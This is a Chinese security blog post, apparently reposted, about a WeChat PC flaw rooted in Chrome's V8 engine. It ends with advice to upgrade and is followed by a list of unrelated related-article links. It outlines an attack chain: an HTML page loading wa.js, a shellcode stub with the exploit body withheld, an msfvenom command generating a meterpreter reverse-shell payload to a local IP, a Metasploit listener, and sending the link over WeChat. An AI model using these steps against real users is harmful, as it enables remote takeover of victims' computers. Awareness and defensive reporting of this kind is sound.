微信链接不要随便点!小心电脑电脑被黑客操控
Hello!大家好!欢迎来到网络安全情报局,一起跟随网络安全特工走进危机四伏的网络世界。当然大家也可以关注我的公众号:网络安全情报局,更多的网络安全资讯、海量干货以及一些 实用工具等你来解锁!
近期,我们的网络安全特工发现微信存在高危漏洞!只要点击链接,你的电脑就可能被黑客完全控制!下面网络安全情报局为大家揭秘黑客是如何操作的。
注:以下仅供分享,其它违法行为均与作者无关
1、漏洞利用的html,通过html调用JavaScript
<script src = "wa.js"></script>
2、wa.js 这里就不展示恶意部分了
ENABLE_LOG = true;
IN_WORKER = true;
var shellcode = [ ]
·
·
·
try{
print("start running");
trigger();
}catch(e){
print(e);
}
3、使用Kali自带的msfvenom生成反弹木马,并将生成十六进制添加到上面代码的shellcode中
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.65 lport=9999 -f csharp
4、再使用metersploit监听端口,设置本地ip和本地监听端口
5、再使用python开发web服务器
6、将恶意链接发送到微信,并用微信点击打开
7、此时受害者就已经中招了,可以使用screenshot命令获取受害者PC当前画面的截图,可以想做什么就做什么了
看到这里,是不是觉得太恐怖了!
别担心,网络安全特工提醒您:赶紧PC端微信快升级到最新版本!!!
根据腾讯安全中心的公告,这是因为chrome浏览器使用的V8引擎存在安全问题导致的。该漏洞仅影响windows版本的PC版微信,且只影响3.2.1.141以下版本。
原作者:WeyCiu丶
转载自:
https://www.freebuf.com/vuls/270497.html
微信链接不要随便点!小心电脑电脑被黑客操控相关推荐
- 为什么不能随便帮别人修电脑
什么,是你的笔记本坏了?那我不能帮你修了,对不起.我要是帮你修了,就得承担这么几个后果: 1.如果不小心拆坏了,那么我得赔. 2.算我走运,装好后电脑正常使用没问题,你会只留下一句谢谢,然后觉得是我应 ...
- 微信如何备份全部的聊天记录到电脑
来源:http://www.jb51.net/softjc/292698.html 微信和QQ相比有一个最大的不足,那就是一旦删除和好友的聊天窗口,之前的聊天记录基本就找不到了,但是作为社交软件,随时 ...
- 微信里怎么打开html文件夹下,微信里的文件夹怎样在电脑里打开
微信收藏怎么导出?我的微信里面收藏的内容不少,想要传到电脑上,主要是一些比较好的文章和图片,收藏内容太多的话,会有些麻烦.那么微信我的收藏怎么导出到电脑?小编就为大家介绍导出的方法,希望能帮到大家! ...
- 苹果微信更新不了最新版本_电脑微信版本更新!支持批量删除联系人
每一次的微信更新一般来说都要引起一阵全网的讨论,甚至还有可能登上热搜,苹果和安卓系统有时还会有不同的更新内容.但是大家好像都容易忽视了电脑端的微信更新内容,电脑端的微信更新总是悄无声息地,也没什么人关 ...
- 微信多开工具 可以同时在电脑上打开多个微信 免费开源
本程序用C#代码编写,运行环境FrameWork5.0以上. 主要代码: using Microsoft.Win32; using System; using System.Collections.G ...
- 微信发布Windows PC 测试版,支持电脑与手机互迁聊天记录
现在大家在工作和日常生活的时候,都离不开微信,本身当年用户最多的软件的腾讯的QQ,但是现在微信已经后来居上了,已经压住了腾讯QQ一头,但是在日常使用的时候,微信的移动端和PC端使用的,记录并不是互通的 ...
- 怎样在电脑上登录微信,福利到,如何登录电脑微信
微信是我们社交中重要的一部分,通过微信我们能够很轻松的与异地好友面对面的视频聊天.手机版微信我们使用很多,那么电脑又该如何使用呢.现在就为大家讲解下如何登陆电脑版微信,实现电脑微信的登录. 因为要在电 ...
- 一个电脑白痴与黑客的对话
黑客:我控制了你的电脑 小白:怎么控制的? 黑客:用木马 小白:......在哪里?我没看不见 黑客:打开你的任务管理器 小白:.......任务管理器在哪? 黑客:.....你的电脑下面!! 小白: ...
- 彻底崩溃,一个电脑白痴和黑客的对话!
(Qiuyi:笑死人了!) 黑客:我控制了你的电脑 小白:怎么控制的? 黑客:用木马 小白:......在哪里?我没看不见 黑客:打开你的任务管理器 小白:.......任务管理器在哪? 黑客:... ...
最新文章
- 数组、字符串对象、Math对象
- 07Bridge(桥)模式
- IOS 之__bridge__bridge_transfer和__bridge_retained
- centos6.8下安装破解quartus prime16.0以及modelsim ae安装
- PHP:6种GET和POST请求发送方法
- UOJ#244-[UER#7]短路【贪心】
- javafx 图标_JavaFX技巧32:需要图标吗? 使用Ikonli!
- springboot配置单独的参数文件
- tkinter连接数据库实现班级点名系统
- 想写高质量代码,减少代码负债性?底层和源码这类还是得多用用心
- python旋转地球源代码_90行代码让微信地球转起来,太酷了!(python实现)
- Custom Sharepoint Lookup Field
- 485. 最大连续 1 的个数
- 地震数据读写segyio的脑图(c语言接口)
- shenyu自定义插件
- Deepgreen/Greenplum删除节点步骤
- 【土旦】 使用Vant 的Uploader 上传图片 重定义返回格式 使用FormData格式提交
- uestc 1593 老司机破阵(线段树 or multiset)
- 十一、BDB ManyToMany
- Docker--(三)--测试